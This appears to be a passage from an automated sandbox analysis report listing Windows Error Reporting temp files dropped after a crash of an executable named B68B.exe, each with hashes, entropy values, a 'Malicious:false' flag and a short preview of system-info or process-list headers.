                                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.1.8.8.9.3.4.8.1.1.5.3.5.0.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.1.8.8.9.3.4.9.6.3.3.4.4.3.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.0.5.0.d.4.1.1.-.d.b.6.2.-.4.f.5.b.-.b.d.f.f.-.7.1.2.f.7.c.a.9.b.6.a.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.b.1.0.a.2.d.9.-.1.f.0.f.-.4.3.b.3.-.9.5.3.9.-.e.f.b.c.1.e.6.5.f.4.6.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.B.6.8.B...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.7.d.0.-.0.0.0.1.-.0.0.1.5.-.c.1.8.a.-.9.d.e.7.b.9.5.a.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.c.b.a.b.0.7.7.5.3.1.e.c.f.d.d.1.9.8.8.f.f.f.d.b.d.e.6.0.e.7.3.0.0.0.0.9.c.1.7.!.0.0.0.0.c.e.9.e.6.0.5.f.2.5.5.f.4.f.4.7.a.c.f.3.e.e.3.3.1.6.5.4.d.d.7.e.b.6.5.f.8.5.a.b.!.B.6.8.B...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.1.1.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER1003.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.6854223723372486
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYWpICRP8XYEYuW3DHRxYEZB6tFi57P4SHwL1zKja7hIMIwHI0P3:2ZDWDWCZKja7hIMIwo0P3
                                                                                                                                                                    MD5:14D6162D2642D0D630633AEC98B6C79C
                                                                                                                                                                    SHA1:A14ACDA9ECD334C6D90B9130D1766EB3329F83B3
                                                                                                                                                                    SHA-256:684582623D997F037211FCF3E0C331C4F0214FE3DF489342FEC1F33AE0D934BA
                                                                                                                                                                    SHA-512:D3DC8FCA59C8308B222B7C01763541DF23A00182F3609869393126ACCB3F3315C35047C8F4EB711DF37B88C9F4666A0C13E901312E14D67F2E846E6A5C7DA990
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER10CD.tmp.csv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):92912
                                                                                                                                                                    Entropy (8bit):3.051893260326576
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:mRI8Wr0D2rzR+m3MPpIpHKHVlC0n+sI+E+o+1+o+r+I+0+mE+M9+b+J+g+6+H+0r:mRI8Wr0D2rzR+m3MPpIpHK1lC0n+sI+g
                                                                                                                                                                    MD5:E40979437B3C896B888FC61633F0613D
                                                                                                                                                                    SHA1:A2577844BDEA92D820CC1B6620F0F4931720D844
                                                                                                                                                                    SHA-256:1EBFA67A0989DCD15EC6BA48A6E7B644A69FE309C2AC1EBBACA9E31818A5DC4C
                                                                                                                                                                    SHA-512:7544BFFCD34168A6D336840B41E26A2329FAB35A85BC177CC63436964296877F3969718C2F26EB9FB891A37E1BCF74830BFA0872B3A2A6740850D79A241D33B2
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER11C9.tmp.csv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):93780
                                                                                                                                                                    Entropy (8bit):3.0516100143483964
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:I3nkwv5U9VA2wRcNzJVFnvv0n+sI+E+o+1+o+r+I+0+mE+M9+b+J+g+6+H+m+kU6:I3nkwv5U9VA2wRcNzJVFnX0n+sI+E+o7
                                                                                                                                                                    MD5:9CA203D10BA43CD03C0C5797305B2244
                                                                                                                                                                    SHA1:12CF8599C07B155034C8DC7F5AD5B06A1F4DB4E4
                                                                                                                                                                    SHA-256:AF47BFBA844100833E3B03E4CA2B239C76FE5D81F4E2908A6D8715B65CED2B35
                                                                                                                                                                    SHA-512:60A7093F944A35A94262CE900AF91BD1682246D71D30D7FC4A766705A5D0843D661256E66400D6696EC7C85FFEED43325BBB434439BFEBB73ECAAAC68D56CEB1
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER11D8.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.700550197677376
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYWxYnKoNXYjY9SN96aHkrYEZe5tFi57OFiwTh6a0HzUKMikeIj2e:2ZDU9X0KSDHsa0HAKMikpj2e
                                                                                                                                                                    MD5:6EE062FD427CE56E1A0B097B99CA0C24
                                                                                                                                                                    SHA1:A73899CBB906F9CB56CD66B53A68FFB42D746AAE
                                                                                                                                                                    SHA-256:5DB91D505C917438119DF07425DB36DFCB16F8FA6CDAF85CD7CA14BC4A610728
                                                                                                                                                                    SHA-512:D7B5FBBDCCC09C960834FBF9E8B1BF9A7608F8FE0992E7084E1940327F048CA640DCA5D6100060F7EFCD5CB38FB31B3D8D0A1FEE5B321493777B233C3A0F676F
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER1370.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.697549903630374
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYW7uLzDBboYiYeWj9HXYEZTstFik7lF0w2qlIHaJHtfMMkOIq2x:2ZDjFirGSHaJH9MMkZq2x
                                                                                                                                                                    MD5:253C81C9D879053523DE842CF106B21D
                                                                                                                                                                    SHA1:E2F5AF68053134FBF8D995B5DAD924C9CAE74539
                                                                                                                                                                    SHA-256:058EA3572A521B538AE9E5476434AD54E12D8318C90E83C5223E0D5479BA385D
                                                                                                                                                                    SHA-512:F969486E5DE06D3615E167A2F7677E351549AABA352E05B1AD9A25535F1123B54CAFCC4A9C48C677911E8D846441ACBBA9306943D46E3368F9F6E6157922FDF8
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER1C89.tmp.csv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):92686
                                                                                                                                                                    Entropy (8bit):3.052822563183097
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:ci6yZF8UFVzIugcxLBRjskG0n+sI+E+o+1+o+r+I+0+mE+M9+b+J+g+6+H+m+kUT:ci6yZF8UFVzIugcxLBRjsH0n+sI+E+oq
                                                                                                                                                                    MD5:3DB6E6656939AFDC75BEDD34B1680DC7
                                                                                                                                                                    SHA1:FFAB9C79BDE67A2FAA140E8A878CF9DAEB008EA8
                                                                                                                                                                    SHA-256:EAB83248D66FB5B3E0EF73017BBF488EB4579BE06E5992D5A93527DAF9B1B02D
                                                                                                                                                                    SHA-512:6E6110FD629B83F8658997DD7D2E2116B1A3AC4C4F00958493DDBCFC14020BE52F4F470553D8B025D188320BBE1DA52ED3299561B3AF46E59527F5EEB240CEDC
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER1DC3.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.6971895875962724
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYWUkwY1Y9YpWiHXYEZHFtFii7UFRw/qbrdXaLH4GM9QkkIq2c:2ZD3qsclaLH5MikTq2c
                                                                                                                                                                    MD5:D845BA66CD6B2A00407F5C0A976D666A
                                                                                                                                                                    SHA1:2839397F10F3BC042B0AAA8028BA490C54BAE7A9
                                                                                                                                                                    SHA-256:7B2C394EE0E6E87AD5BB12377EACA2B420A950C73F6297F0A1597FAA2BA4FE9B
                                                                                                                                                                    SHA-512:C552EBE577E881433351B2E5DAB6CEB96A027310CA47B87799C72B18648AF6136FD2CC8C79598A9632ABD6303D66F1C3A1544E8ED92BC2F0C0B735FF97B62BEE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER25B3.tmp.csv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):92648
                                                                                                                                                                    Entropy (8bit):3.0529808891535533
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:a/TXFlU8VTKvIugcHLBBKsk/0n+sI+E+o+1+o+r+I+0+mE+M9+b+J+g+6+H+m+kv:a/TXFlU8VTKvIugcHLBBKsO0n+sI+E+6
                                                                                                                                                                    MD5:F0C92BDEBB1A174731FC2A08A16562E7
                                                                                                                                                                    SHA1:E51833B96DC38238BC033B0774207232EDBE3792
                                                                                                                                                                    SHA-256:A1B8560B78EE91B1E808E805C0C6EB32E09140438612F3C2BB12138521B777A8
                                                                                                                                                                    SHA-512:147AB7A658ABE51BA8EE839D63EFADF15A4F38D3CB5D772520D5A53F0F19DAD1CD170C42918CA9F495E5DAE712C53C5CEDE3B2C39A04E613A7DD4200A4352AA8
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER26FC.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.697385110451289
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYWl17QaiY/Y2U5aWMiHdYEZjXtFiW7jFcwAqw+amHV7MEkx4Ik2g:2ZD8J4AvlLamHJMEkxfk2g
                                                                                                                                                                    MD5:37FCD44D57A6B96B75F2B39C8BF25305
                                                                                                                                                                    SHA1:0CFF64D614630CACF6B57455837937F805442BD9
                                                                                                                                                                    SHA-256:A9B6B8B33221AB7B3CE41958AE698FAEFF284DD0968950F167EEFA6AE63C1A61
                                                                                                                                                                    SHA-512:7228C36D8094177FA0BBE12F6412A333F9A08BC0AFBCFCB03E8EA578543E3958697C133E98E7609A880FE8BA52468273208813F47964ECF11F887C382507FCA6
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER2F69.tmp.csv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):93088
                                                                                                                                                                    Entropy (8bit):3.0525408714839033
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:aR4GeXWFrU8V2ugcrQBePsk/0n+sI+E+o+1+o+r+I+0+mE+M9+b+J+g+6+H+m+kN:aR4GeXWFrU8V2ugcrQBePsO0n+sI+E+0
                                                                                                                                                                    MD5:066CE5195637887FD86BD2E3D7CFCF81
                                                                                                                                                                    SHA1:DCCE0EF09C784652A78F0DAAA2BB7FD8E5ADAC6B
                                                                                                                                                                    SHA-256:BC2F3D25A8F85FF0D433043B29143157F98205229C12C86217E7A9901B845271
                                                                                                                                                                    SHA-512:506660F62EA3A3E867AB651E83DFBE6F89ABFF907E2D2F06C434C0AEDC18F778636862162D1D54A62AB11CED2EA1EFB9494D79825A5C93C8F366396716E38456
                                                                                                                                                                    Malicious:false
